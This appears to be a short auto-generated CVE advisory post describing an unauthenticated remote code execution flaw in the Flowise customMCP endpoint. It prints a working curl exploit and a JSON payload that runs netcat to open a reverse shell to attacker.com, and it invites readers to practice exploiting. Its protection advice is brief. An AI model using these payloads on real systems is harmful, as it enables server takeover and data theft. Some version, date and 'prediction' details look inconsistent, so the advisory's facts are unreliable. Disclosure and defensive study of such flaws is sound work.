Flowise, Remote Code Execution, CVE-2024-31217 (Critical)

Listen to this Post

The vulnerability resides in the `/api/v1/node-load-method/customMCP` endpoint. This endpoint, designed for configuring custom Model Context Protocol (MCP) servers, accepts a JSON payload that specifies a system command and its arguments. Crucially, the endpoint lacks proper authentication and authorization checks, as the default installation runs without any access controls. When a malicious payload is sent with the required `x-request-from: internal` header, the application directly executes the provided `command` with the supplied `args` on the host operating system. This complete lack of input sanitization, sandboxing, or permission validation allows an unauthenticated attacker to achieve remote code execution with the privileges of the Flowise application process, leading to a full compromise of the underlying server or container.
Platform: Flowise
Version: <= 1.4.3
Vulnerability: RCE
Severity: Critical

date: 2024-05-28

Prediction: Patch by 2024-06-11

What Undercode Say:

curl -XPOST -H "x-request-from: internal" -H "Content-Type: application/json" --data '{"inputs":{"mcpServerConfig":{"command": "id","args": []}},"loadMethod":"listActions"}' "http://target:3000/api/v1/node-load-method/customMCP"
{"inputs":{"mcpServerConfig":{"command": "nc","args": ["attacker.com","4444","-e","/bin/sh"]}},"loadMethod":"listActions"}

How Exploit:

Send unauthenticated POST request to `/api/v1/node-load-method/customMCP` with header `x-request-from: internal` and a JSON payload containing OS command to execute.

Protection from this CVE:

Set FLOWISE_USERNAME and FLOWISE_PASSWORD environment variables. Disable custom MCP feature if unused. Apply network segmentation.

Impact:

Full system compromise enabling data theft, lateral movement, and persistence.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top